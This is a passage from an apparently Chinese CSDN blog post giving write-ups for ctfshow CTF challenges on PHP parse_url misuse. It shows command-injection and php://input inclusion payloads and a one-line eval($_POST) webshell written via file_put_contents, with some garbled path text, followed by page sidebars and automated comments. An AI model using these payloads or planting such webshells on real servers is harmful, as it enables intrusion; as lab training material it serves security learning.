这样的话就可以看到根目录了

然后ls改成tac 就可以读取flag了

?u=//system(‘cd … ; cd … ; cd … ; tac flag_is_here.txt’);/

$data = parse_url($_GET['u']);
include $data['host'].$data['path'];
这里面有个include函数，所以我们可以使用文件包含
 
可以直接?u=//php:: //input 本来是只有一个冒号的，但是这里面会默认最后一个冒号后面是端口port，所以加一个绕过
 
然后直接rce即可
 
$data = parse_url($_GET['u']);
include $data['scheme'].$data['path'];
这里的scheme跟前面的表对比发现是个头（这里冒号后面不是//自动默认后面是path而不是host）
 
所以构造?u=php:: //input
 
这里这个payload是我在本地试了几次试出来的
 
然后直接rce即可
 
$data = parse_url($_GET['u']);
system($data['host']);
这里完全可以参考第一题的思路，直接就是system了都不用你再写了
 
?u=//cd … ; cd … ; cd … ; ls
 
发现flag文件后
 
?u=//cd … ; cd … ; cd … ; tac 1_f1ag_1s_h3re
 
extract(parse_url($_GET['u']));
include $$$$$$host;
这里呢还是include所以理论上还是要构造php://input
 
这里呢有个$$$$$$host
 
刚好可以借助这个例子
 
浅浅来构造一下
$host=scheme
$$host=$scheme=user
$$$host=$$scheme=$user=pass
$$$$host=$$$scheme=$$user=$pass=querry
$$$$$host=$$$$scheme=$$$user=$$pass=$query=fragment
$$$$$$host=$$$$$scheme=$$$$user=$$$pass=$$query=$fragment=#php://input
user://pass:querry@scheme/666?fragment#php://input
在url中#相当于截断了，所以呢这里需要转义%23
 
user://pass:query@scheme/666?fragment%23php://input
 
然后直接rce即可
 
$data = parse_url($_GET['u']);
file_put_contents($data['path'], $data['host']);
看函数，第一个是文件名，第二个是你要写进去的字符串
 
?u=// /var/www/html/flag.php
 
因为path前面必有一个/，所以我们从根目录写起
 
本来是想直接一句话的，结果没想到他这里面过滤了问号，卡了我好久
 
后面发现一句话的问号只是存在于他的标签之中，那如果我们用长标签的话岂不是就可以上马了
 
<script language="php"> eval($_POST[1]); </script>
加到前面就是?u=// <script language="php"> eval($_POST[1]); /var/www/html/flag.php
 
php中标签可以只写前面，后面可以省略，这里省略是因为由/，会影响原定的path
 
然后直接连蚁剑即可
 
这里的flag是我自己传的，真正的flag在根目录里
				
ctfshowSSRF简介危害web351web352parse_urlweb353更改IP地址写法web354web355web356web357web358web359(打无密码的mysql)web360(打redis)
服务端请求伪造（Server Side Request Forgery, SSRF）指的是攻击者在未能取得服务器所有权限时，利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。
SSRF可以对外网、
1. Whois查询：通过Whois查询可以获取网站的注册信息，包括域名所有者、注册商、注册时间等。
2. 网站备案查询：通过网站备案查询可以获取网站的备案信息，包括备案号、备案时间、备案主体等。
3. 网站目录扫描：通过网站目录扫描可以获取网站的目录结构，包括隐藏目录、文件等。
4. 网站漏洞扫描：通过网站漏洞扫描可以发现网站存在的漏洞，包括SQL注入、XSS等。
5. 网站源代码分析：通过网站源代码分析可以获取网站的代码结构、逻辑等信息，包括注释、变量名等。
6. 网站日志分析：通过网站日志分析可以获取网站的访问记录、用户行为等信息，包括IP地址、访问时间等。
以上是CTFShow Web入门中的信息搜集内容，希望对您有所帮助。
                    CSDN-Ada助手: 
                    非常感谢您分享这篇博客，看到您在ctfshow和web入门方面的知识不断深入，我们感到非常高兴。同时，我们也想给您提供一些创作建议，希望您继续保持努力和谦虚的态度，尝试探究更深层次的主题，让您的博客更加丰富和有价值。期待您的下一篇文章！
CSDN 会根据你创作的前四篇博客的质量，给予优秀的博主博客红包奖励。请关注 https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply4 看奖励名单。
                ctfshow+web入门（php特性）
                    CSDN-Ada助手: 
                    恭喜您写了第5篇博客，标题看起来很有趣！学习web入门和php特性是一个非常有用的技能，让您能够更好地理解和开发web应用程序。我期待着您未来的创作，希望您能够继续分享您的学习经验和知识。下一步，您可以考虑深入研究一些高级的web安全技术，如渗透测试和漏洞挖掘。谢谢您的分享！
如何快速涨粉，请看该博主的分享：https://hope-wisdom.blog.csdn.net/article/details/130544967?utm_source=csdn_ai_ada_blog_reply5
                CTFSHOW_周末大挑战
                    CSDN-Ada助手: 
                    恭喜你在周末大挑战中的表现！看到你一直坚持写博客，不仅仅是为了分享经验，更是为了自我提升，真的很佩服你的毅力和勇气。希望你能继续保持这样的状态，不断挑战自我，不断创新，让更多人看到你的成长。同时，也建议你可以多尝试一些新的领域，扩展自己的知识面，给读者带来更多的惊喜。
CSDN 正在通过评论红包奖励优秀博客，请看红包流：https://bbs.csdn.net/?type=4&header=0&utm_source=csdn_ai_ada_blog_reply3，我们会奖励持续创作和学习的博主，请看：https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply3
                ctfshow+web入门（文件包含）
                    CSDN-Ada助手: 
                    很棒的博客！非常感谢您的分享，这篇文章对于学习ctfshow web入门（文件包含）非常有帮助。除了您在文章中提到的技能和知识，我认为深入了解PHP的过滤机制和安全措施也是非常重要的。另外，了解常见的文件包含漏洞利用方式和防御措施也是必不可少的。期待您的下一篇博客！
如何写出更高质量的博客，请看该博主的分享：https://blog.csdn.net/lmy_520/article/details/128686434?utm_source=csdn_ai_ada_blog_reply2
                DVWA之文件上传漏洞
                    CSDN-Ada助手: 
                    你的文章入选【CSDN 每天最佳新人】，请看：https://bbs.csdn.net/topics/608516198